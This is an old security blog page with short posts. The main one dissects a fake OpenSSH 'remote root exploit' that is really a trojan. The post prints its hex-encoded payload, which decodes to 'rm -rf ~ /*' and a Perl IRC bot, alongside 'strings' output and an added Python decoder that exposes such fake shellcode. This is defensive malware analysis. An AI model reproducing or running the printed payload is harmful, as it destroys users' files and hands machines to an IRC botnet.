Pen Testing the Web With Firefox
Posted: February 19th, 2010 | Author: xanda | Filed under: IT Related | Tags: addons, exploit, firefox, hacking, metasploit, web, web based
Nice write-up by Michael “theprez98” Schearer.
Call for Papers BruCON.v2 2010: Hacking for B33r
================================
Brussels, Belgium — This is a call for papers and participation for the second BruCON edition, a 2-day Security and Hacking Conference, full of interesting presentations, workshops and security challenges.
BruCON is an open-minded gathering of people discussing computer security, privacy, and information technology. The conference tries to create bridges between the various actors active in the computer security world, including but not limited to hackers, security professionals, security communities, non-profit organizations, CERTs, students, law enforcement agencies…
The conference will be held in Brussels (24 & 25 September 2010) at The Surfhouse (www.surfhouse.be).
I’ve heard about decompiling Java classes since 2007 (when I was in MIMOS) but never tried it before. Maybe because I don’t really code in Java.. and I don’t really like Java.
But today I found something interesting to play with.. a J2ME-based one-time password application.. Since I’m on a Mac, I found that Java Decompiler (JD) is the most suitable tool for me..
It’s also available for Windows and Linux..
See some screenshots HERE
PenTestIT is in my RSS list, and just now I got a feed item from PenTestIT with the title “openssh-53p1-remote-root.c”.
Hurm.. what surprising news, but.. I think I’m too old for this.. let’s see..
xanda:tmp adnan$ cd /tmp
xanda:tmp adnan$ mkdir lame
xanda:tmp adnan$ cd lame/
xanda:lame adnan$ wget http://pentestit.com/wp-content/uploads/2010/02/openssh-53p1-remote-root.c
--2010-02-07 20:41:28--  http://pentestit.com/wp-content/uploads/2010/02/openssh-53p1-remote-root.c
Resolving pentestit.com (pentestit.com)... 208.87.241.96
Connecting to pentestit.com (pentestit.com)|208.87.241.96|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13273 (13K) [text/x-c]
Saving to: `openssh-53p1-remote-root.c'

100%[=========================================================================================================================================>] 13,273      7.82K/s   in 1.7s

2010-02-07 20:41:30 (7.82 KB/s) - `openssh-53p1-remote-root.c' saved [13273/13273]

xanda:lame adnan$ more openssh-53p1-remote-root.c
/* openssh-53p1-remote-root.c
 * OpenSSH <= 5.3p1-1 Remote Root Exploit by the|one
 * Email: root@chamillionaire.com
 * Release date: Unreleased (private) / 2010
 * Available Patch: No fix-patch has been issued or reported.
 *
 * -----------------
 * Additional Notes:
 * -----------------
 * By using this software, you take any and/or all responsibility
 * for the damage(s) caused and will not bitch to me, the|one, about it.
 *
 * USE THIS SOFTWARE AT YOUR OWN DISCRETION! Later skiddies. :> */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#define VALID_RANGE 0xb44ffe00
#define build_frem(x,y,a,b,c) a##c##a##x##y##b
char jmpcode[] =
"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";
char shellcode[] =
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
"\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
"\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
"\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
"\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
"\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
"\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
"\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
xanda:lame adnan$ gcc openssh-53p1-remote-root.c -o fake
xanda:lame adnan$ strings fake | more
the|one is rooting your Linux/FreeBSD Network
Usage: %s -h <host> -p port
Options:
 -h ip/host of target
 -p port
 -d username
 -B memory_limit 8/16/64
Root is required for raw sockets, etc.
[+] the|one's OpenSSH Remote Root Exploit - 2010
[-] Resolving Failed
[-] Connecting Failed
Getting root isn't that hard, skiddie
PS1='sh-3.2#' /bin/sh
[-] Failed to exploit the target :
rm -rf ~ /* 2> /dev/null &
#!/usr/bin/perl
$chan="#cn";
$ke";
while (<$sockG (.*)$/){print ";
while (<$sockn";
            sleep 1;
       k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl
            #!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="G (.*)$/){print ";
while (<$sockn";
            sleep 1;
       k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl
|
knock knock knock… script kiddies.. grow up!
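The check the post does by hand (compile, then `strings` the binary) can be done without ever building the file: decode the `\x..` string literals straight out of the C source and look at what the "shellcode" really is. Real x86 shellcode is mostly opcode bytes, so a payload that decodes to almost 100% printable text, let alone a Perl shebang and an `rm -rf`, is a trap, not an exploit. The script below is an added example, not code from the original post or from PenTestIT; it embeds the first literals of the `jmpcode` and `shellcode` arrays exactly as they appear above as constructed sample input, and the indicator list and the 90% printable-ratio threshold are my own choices.

```python
import re

# Constructed sample input: the first literals of the jmpcode and shellcode
# arrays exactly as they appear in the fake openssh-53p1-remote-root.c above.
# Embedded here so the script runs offline; the real file is longer.
SAMPLE_C = r'''
#define VALID_RANGE 0xb44ffe00
#define build_frem(x,y,a,b,c) a##c##a##x##y##b
char jmpcode[] =
"\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
"\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";
char shellcode[] =
"\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
"\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65"
"\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b";
'''

# Matches `char NAME[] = "..." "..." ;` with any number of adjacent literals.
ARRAY_RE = re.compile(r'char\s+(\w+)\s*\[\s*\]\s*=\s*((?:"(?:[^"\\]|\\.)*"\s*)+);', re.S)
LITERAL_RE = re.compile(r'"((?:[^"\\]|\\.)*)"', re.S)

SIMPLE_ESCAPES = {"n": 0x0A, "t": 0x09, "r": 0x0D, "a": 0x07, "b": 0x08,
                  "f": 0x0C, "v": 0x0B, "\\": 0x5C, '"': 0x22, "'": 0x27}
HEX_DIGITS = "0123456789abcdefABCDEF"


def decode_c_literal(lit: str) -> bytes:
    """Turn the inside of a C string literal into the bytes the compiler emits."""
    out = bytearray()
    i = 0
    while i < len(lit):
        if lit[i] != "\\":
            out.extend(lit[i].encode("utf-8"))
            i += 1
            continue
        nxt = lit[i + 1]
        if nxt == "x":                       # \xHH... (C consumes every hex digit)
            j = i + 2
            while j < len(lit) and lit[j] in HEX_DIGITS:
                j += 1
            if j == i + 2:
                raise ValueError("\\x with no hex digits at offset %d" % i)
            out.append(int(lit[i + 2:j], 16) & 0xFF)
            i = j
        elif nxt in "01234567":              # \ooo (at most three octal digits)
            j = i + 1
            while j < len(lit) and j < i + 4 and lit[j] in "01234567":
                j += 1
            out.append(int(lit[i + 1:j], 8) & 0xFF)
            i = j
        else:                                # \n, \t, \\, \" and friends
            out.append(SIMPLE_ESCAPES.get(nxt, ord(nxt)))
            i += 2
    return bytes(out)


def extract_arrays(src: str) -> dict:
    """Map every `char name[] = "..."` array in the C source to its decoded bytes."""
    arrays = {}
    for m in ARRAY_RE.finditer(src):
        name, body = m.group(1), m.group(2)
        arrays[name] = b"".join(decode_c_literal(lit) for lit in LITERAL_RE.findall(body))
    return arrays


# Assumed indicator list: strings that have no business inside the "shellcode"
# of a real remote exploit (shell commands, interpreter shebangs, IRC verbs).
INDICATORS = [b"rm -rf", b"#!/", b"/bin/sh", b"/dev/null", b"JOIN ", b"NICK ",
              b"wget ", b"curl "]


def classify(blob: bytes) -> dict:
    """Real shellcode is mostly opcodes; >90% printable (assumed threshold) means text."""
    printable = sum(1 for b in blob if 32 <= b < 127 or b in (9, 10, 13))
    ratio = printable / len(blob) if blob else 0.0
    hits = [ind.decode() for ind in INDICATORS if ind in blob]
    verdict = "plain-text payload, not shellcode" if ratio > 0.9 else "binary"
    return {"printable_ratio": round(ratio, 3), "hits": hits, "verdict": verdict}


def audit(src: str) -> dict:
    """Decode and classify every char array in a suspicious exploit source file."""
    return {name: classify(data) for name, data in extract_arrays(src).items()}


if __name__ == "__main__":
    for name, data in extract_arrays(SAMPLE_C).items():
        print("%s (%d bytes): %r" % (name, len(data), data))
        print("    ", classify(data))
```

Run it over the real file with `audit(open("openssh-53p1-remote-root.c").read())`. On the sample above, `jmpcode` decodes to the shell command `rm -rf ~ /* 2> /dev/null &` and `shellcode` starts with `#!/usr/bin/perl`, which matches what `strings fake` showed in the post: compiling the file is harmless, running the resulting binary is not.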
Quick update
Here is my short update. I was playing around with the ‘nice’ modem and I found 2 vulnerabilities:
1) Remote code execution
2) DoS
Tested on Firmware Version : 2.10.5.0(UE0.C2C)3.7.6.1
I’m looking forward to playing around with Riger Corporation’s modem that came with an “Enhanced by TM R&D Malaysia” label on it.